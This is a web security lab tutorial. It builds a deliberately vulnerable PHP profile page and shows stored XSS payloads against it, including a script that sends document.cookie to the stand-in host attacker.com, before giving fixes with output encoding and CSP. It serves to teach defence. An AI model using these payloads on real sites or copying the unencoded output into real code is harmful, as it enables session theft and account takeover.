Objective
Learn how to exploit Content Injection and JavaScript Injection vulnerabilities to modify a web page’s content or execute malicious JavaScript in users’ browsers. Understand how to mitigate these risks using proper input sanitization and Content Security Policies (CSP).
Scenario
You are assessing a web application that allows users to update their profile information. Due to the lack of input sanitization, attackers can inject malicious content, such as JavaScript, into the profile page, leading to data theft or account compromise.
Lab Setup
Prerequisites:
- Basic knowledge of PHP, HTML, and JavaScript.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for User Profile Update
Create a file profile.php:
<?php
session_start();
$_SESSION['user'] = 'alice'; // Simulate a logged-in user

// Vulnerable by design: the bio is stored and later echoed without any encoding,
// so whatever the user submits is interpreted by the browser as HTML.
if (isset($_POST['update'])) {
    $bio = $_POST['bio'];
    file_put_contents('bio.txt', $bio);
}
$stored_bio = file_exists('bio.txt') ? file_get_contents('bio.txt') : '';
?>
<h2>User Profile</h2>
<form method="POST" action="">
    Bio: <textarea name="bio" rows="5" cols="30"><?php echo $stored_bio; ?></textarea><br>
    <button type="submit" name="update">Update Bio</button>
</form>
<h3>Bio Preview:</h3>
<div><?php echo $stored_bio; ?></div>
Running the Application
- Start the Apache server.
- Place profile.php in the web server’s root directory (htdocs for XAMPP).
- Open http://localhost/profile.php in your browser.
Exploitation Steps
Step 1: Injecting Malicious JavaScript
In the Bio field, enter the following payload:
<script>alert('XSS')</script>
Submit the form.
Expected Result:
- An alert box pops up when the page reloads, demonstrating JavaScript execution.
Step 2: Data Theft via JavaScript Injection
Replace the payload with:
<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>
Expected Result:
- The user’s session cookie is sent to the attacker’s server.
Step 3: Modifying Page Content
Enter the following payload:
<h1>Hacked by Attacker</h1>
Expected Result:
- The content of the page is visibly altered.
Solution and Prevention
Problem Analysis
- User input is stored without validation and rendered without output encoding, so the browser interprets it as HTML and executes any script it contains.
Fixing the Vulnerability
Sanitize User Input
Use htmlspecialchars() to escape HTML special characters:
// Converts <, >, &, " and ' to HTML entities so the browser shows them as text
$bio = htmlspecialchars($_POST['bio'], ENT_QUOTES, 'UTF-8');
file_put_contents('bio.txt', $bio);
Implement Content Security Policy (CSP)
Add a CSP header to block inline scripts (header() must be called before the script sends any output, including whitespace before <?php):
header("Content-Security-Policy: default-src 'self'; script-src 'self';");
Use Trusted Libraries for Input Sanitization
Use libraries like HTMLPurifier for sanitizing rich-text inputs.
Validate and Filter Input on Both Client and Server Side
Implement strict input validation rules (for example, length limits and a character-set check). Client-side checks only improve usability; they can be bypassed with any HTTP client, so the server-side check is the one that actually enforces the rule.
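Putting the fixes together, as an added example (not the lab's own code): a hardened profile.php that sends the CSP header before any output and applies htmlspecialchars() at output time in each rendering context, instead of at storage time as the snippet above does, so bio.txt keeps the raw text and nothing is double-encoded. It assumes the same single-file lab layout; the 500-character limit and the extra object-src/base-uri directives are assumptions added here, not taken from the page.

```php
<?php
// Added example: hardened profile.php. Assumes the same lab layout (bio.txt next to the
// script); the 500-character limit and the extra CSP directives are assumed hardening.
session_start();
$_SESSION['user'] = 'alice'; // Simulate a logged-in user

// CSP must be sent before any output; script-src 'self' blocks inline <script> blocks
// and inline event handlers, so a stored payload cannot run even if encoding is missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');

// Output-encoding helper: the raw text is stored once and encoded at every output point.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$error = '';
if (isset($_POST['update'])) {
    $bio = (string)($_POST['bio'] ?? '');
    // Server-side validation: reject non-UTF-8 and oversized input (client-side
    // maxlength below is only a convenience and can be bypassed).
    if (!mb_check_encoding($bio, 'UTF-8')) {
        $error = 'Bio must be valid UTF-8.';
    } elseif (mb_strlen($bio, 'UTF-8') > 500) {
        $error = 'Bio must be 500 characters or fewer.';
    } else {
        file_put_contents('bio.txt', $bio, LOCK_EX);
    }
}
$stored_bio = file_exists('bio.txt') ? file_get_contents('bio.txt') : '';
?>
<h2>User Profile</h2>
<?php if ($error !== ''): ?>
    <p><?php echo e($error); ?></p>
<?php endif; ?>
<form method="POST" action="">
    Bio: <textarea name="bio" rows="5" cols="30" maxlength="500"><?php echo e($stored_bio); ?></textarea><br>
    <button type="submit" name="update">Update Bio</button>
</form>
<h3>Bio Preview:</h3>
<!-- Encoded at output: the lab's <script> and <h1> payloads render as literal text. -->
<div><?php echo e($stored_bio); ?></div>
```

With this version the "Testing After Fix" payloads below appear verbatim in the preview, and the browser console reports a CSP violation if an inline script somehow reaches the page.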
Testing After Fix
Attempt to inject the previous JavaScript payload:
<script>alert('XSS')</script>
Expected Result:
The script does not execute; the input is displayed as plain text.
Attempt to modify page content:
<h1>Hacked by Attacker</h1>
Expected Result:
HTML tags are escaped, and no unauthorized content change occurs.
Conclusion
In this lab, you exploited Content Injection and JavaScript Injection vulnerabilities to manipulate web content and execute malicious code. You also learned how to prevent these attacks by sanitizing input, implementing Content Security Policies (CSP), and validating user input properly.